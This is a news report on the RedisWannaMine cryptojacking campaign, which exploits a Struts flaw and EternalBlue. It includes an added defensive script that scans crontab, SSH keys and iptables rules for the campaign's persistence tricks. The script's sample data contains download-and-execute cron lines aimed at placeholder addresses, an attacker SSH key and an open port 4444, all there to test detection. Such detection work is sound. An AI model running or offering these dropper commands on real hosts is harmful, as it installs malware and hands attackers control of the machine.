RedisWannaMine is a sophisticated attack which targets servers to fraudulently mine cryptocurrency.
Researchers have uncovered a new cryptojacking scheme which utilizes the leaked NSA exploit EternalBlue to infect vulnerable Windows servers.
On Thursday, security professionals from Imperva revealed the attack, warning that this latest scheme is far more sophisticated than most recorded cryptojacking attempts, which are generally rather simple in nature.
The new attack, called RedisWannaMine, targets servers to mine cryptocurrency and “demonstrates a worm-like behavior combined with advanced exploits to increase the attackers’ infection rate and fatten their [operator] wallets.”
When a target server has been identified, the malware exploits CVE-2017-9805, an unsafe-deserialization vulnerability in the Apache Struts REST plugin when it uses the XStream handler.
If exploited, the security flaw allows attackers to remotely execute code without authentication on an application server.
This vulnerability is used by the attackers to run a shell command which downloads cryptocurrency mining malware.
However, the downloader used is more sophisticated than usual: it also establishes persistence by adding new entries to crontab, and keeps remote access to the victim machine by adding SSH keys to the authorized_keys file and modifying the system's iptables rules.
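The three persistence and access mechanisms above (cron entries, SSH authorized_keys additions, iptables changes) are the artefacts a responder would look for on a suspected host. The script below is an added example written for this article, not code from Imperva or from the malware: it runs three baseline checks over constructed sample inputs (a crontab, an authorized_keys file, and `iptables -S` output, all made up here with RFC 5737 documentation addresses and fake key blobs) and flags download-and-execute cron jobs, SSH keys whose fingerprint is not on an allowlist, and INPUT ACCEPT rules for ports outside an expected set. The allowlist and expected-port baseline are assumptions a real deployment would replace with its own.

```python
"""Host checks for the persistence mechanisms described above: cron
download-and-run entries, unrecognised SSH authorized_keys, and
unexpected iptables ACCEPT rules. All sample inputs are constructed."""
import base64
import hashlib
import re

KEY_TYPES = {"ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}

# Constructed crontab: one legitimate job and two download-and-execute jobs.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -fsSL http://198.51.100.7/dl.sh | sh
@reboot wget -q -O- http://203.0.113.5/x.sh | bash
"""

# Constructed key blobs (not real keys; only their base64 shape matters here).
ADMIN_BLOB = base64.b64encode(b"constructed-admin-key-blob").decode()
ROGUE_BLOB = base64.b64encode(b"constructed-attacker-key-blob").decode()
SAMPLE_AUTHORIZED_KEYS = f"""\
ssh-ed25519 {ADMIN_BLOB} admin@bastion
no-pty ssh-rsa {ROGUE_BLOB} root@attacker
"""

# Constructed `iptables -S` output with one ACCEPT rule outside the baseline.
SAMPLE_IPTABLES = """\
-P INPUT DROP
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 443 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 4444 -j ACCEPT
"""

# A fetch tool whose output is piped into a shell, the classic dropper shape.
DOWNLOAD_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def suspicious_cron_entries(crontab_text):
    """Return cron lines that fetch a remote script and pipe it into a shell."""
    return [line for line in crontab_text.splitlines()
            if not line.lstrip().startswith("#") and DOWNLOAD_AND_RUN.search(line)]


def ssh_fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint: unpadded base64 of SHA-256(key blob)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def unexpected_ssh_keys(authorized_keys_text, allowed_fingerprints):
    """Return (fingerprint, comment) for each key whose fingerprint is not allowlisted.
    Option prefixes such as no-pty are skipped by locating the key-type field."""
    findings = []
    for line in authorized_keys_text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        idx = next((i for i, f in enumerate(fields) if f in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(fields):
            continue  # malformed line; a stricter checker would report it
        fp = ssh_fingerprint(fields[idx + 1])
        if fp not in allowed_fingerprints:
            findings.append((fp, " ".join(fields[idx + 2:])))
    return findings


ACCEPT_RULE = re.compile(r"^-A INPUT\b.*--dport (\d+)\b.*-j ACCEPT$")


def unexpected_accept_rules(iptables_s_text, expected_ports):
    """Return INPUT ACCEPT rules whose destination port is not in the baseline."""
    findings = []
    for line in iptables_s_text.splitlines():
        m = ACCEPT_RULE.match(line.strip())
        if m and int(m.group(1)) not in expected_ports:
            findings.append(line.strip())
    return findings


def run_checks(crontab_text=SAMPLE_CRONTAB,
               authorized_keys_text=SAMPLE_AUTHORIZED_KEYS,
               iptables_s_text=SAMPLE_IPTABLES,
               allowed_fingerprints=None,
               expected_ports=frozenset({22, 443})):
    """Run all three checks; the defaults are the constructed samples and an
    assumed baseline (admin key allowlisted, ports 22 and 443 expected)."""
    if allowed_fingerprints is None:
        allowed_fingerprints = {ssh_fingerprint(ADMIN_BLOB)}
    return {
        "cron": suspicious_cron_entries(crontab_text),
        "ssh_keys": unexpected_ssh_keys(authorized_keys_text, allowed_fingerprints),
        "iptables": unexpected_accept_rules(iptables_s_text, expected_ports),
    }


if __name__ == "__main__":
    for check, hits in run_checks().items():
        print(f"{check}: {len(hits)} finding(s)")
        for hit in hits:
            print("   ", hit)
```

On a live host the three inputs would come from `crontab -l` for each user plus `/etc/cron.d`, every user's `~/.ssh/authorized_keys`, and `iptables -S`; the fingerprint allowlist should be built from `ssh-keygen -lf` over the keys you actually issued, not from whatever is on the box at triage time.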
Other packages are downloaded using standard Linux package managers, and the payload also includes masscan, a TCP port scanner hosted on GitHub.